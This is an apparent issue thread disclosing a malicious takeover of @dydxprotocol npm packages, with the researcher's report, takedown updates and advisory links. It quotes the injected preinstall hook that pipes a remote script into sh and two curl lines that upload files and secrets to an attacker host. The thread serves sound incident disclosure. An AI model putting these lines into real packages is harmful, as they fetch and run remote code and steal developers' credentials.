@dydxprotocol packages download and execute a third party malicious code [malicious takeover]

[mensfeld]

Hey, I'm a security researcher from https://mend.io

This malicious code was found by us at https://Mend.io using our Supply Chain Defender technology

Looking at the diff here: https://my.diffend.io/npm/@dydxprotocol/solo/0.41.0/0.41.1

A preinstall was added:

"preinstall": "curl -s http://api.circle-cdn.com/ci.js | sh",

but this script contains a code that looks malicious:

    subprocess.getoutput("curl -X POST http://api.circle-cdn.com/uploader.php -F 'uploaded_file=@" + filename2 + "' -F 'submit=Upload'")
    subprocess.getoutput('curl -X POST http://api.circle-cdn.com/api.php -d "textdata=' + allen + '"')

it seems to be stealing credentials and other secrets.

This applies to other packages of the ecosystem as well.

[mensfeld]

Ok, the malicious packages versions were taken down after my report to NPM.

Now let me write a blog post on this with a post-mortem.

[louislang]

The platform we're building triggered on this about 4 hours ago. Was going to reach out to alert you, but glad to see you guys were on top of it. If you need any files/timestamps for the post-mortem, please let me know. Would be happy to help out!

[mensfeld]

@louislang I think I have all the data.

[louislang]

👍 great work on the quick catch!

[mensfeld]

GH issued the advisories per my request:

https://github.com/advisories/GHSA-xjr5-5w2w-3233 https://github.com/advisories/GHSA-42m8-vq85-5486

[BrendanChou]

Thanks all, I have reached out to npm to offer advisories and take down the affected packages. At the time of writing all have been taken down except solo@0.41.1. This looks to be a temporary oversight as they did remove solo@0.41.2

[mensfeld]

@BrendanChou any chance on getting info on how effective the attackers were on your side?